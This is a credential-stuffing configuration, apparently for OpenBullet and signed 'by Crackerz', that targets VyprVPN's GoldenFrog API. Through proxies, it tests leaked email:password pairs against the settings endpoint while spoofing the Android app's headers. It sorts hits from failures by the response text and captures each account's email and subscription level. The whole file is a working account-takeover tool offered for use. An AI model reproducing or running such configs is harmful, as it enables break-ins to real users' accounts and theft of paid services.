[SETTINGS]
{
  "Name": "vyprvpn.Api_Config",
  "SuggestedBots": 86,
  "LastModified": "2019-05-07T02:08:00.1374881-05:00",
  "AdditionalInfo": "",
  "Author": "by Crackerz",
  "Version": "1.0.0",
  "IgnoreResponseErrors": false,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#Login REQUEST GET "https://api.goldenfrog.com/settings" 
  
  HEADER "User-Agent: okhttp/3.8.1" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Host: api.goldenfrog.com" 
  HEADER "username: <USER>" 
  HEADER "password: <PASS>" 
  HEADER "X-GF-Agent: VyprVPN Android v2.30.0.10229. (c3261b51)" 
  HEADER "X-GF-PRODUCT: VyprVPN" 
  HEADER "X-GF-PRODUCT-VERSION: 2.30.0.10229" 
  HEADER "X-GF-PLATFORM: Android" 
  HEADER "X-GF-PLATFORM-VERSION: 5.0.2" 
KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Success OR 
    KEY "\"account_level" 
  KEYCHAIN Failure OR 
    KEY "invalid username or password" 
#User PARSE "<SOURCE>" LR "\"user_email\": \"" "\"," -> CAP "user Combo" 
#Capture_Level PARSE "<SOURCE>" LR "account_level\": \"" "\", " -> CAP "account_level" 
KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "FREE" OR 
    KEY "\"account_level\": \"Free\", " 
FUNCTION Constant "Config_by-Crackerz" -> CAP "VyprVPN" 
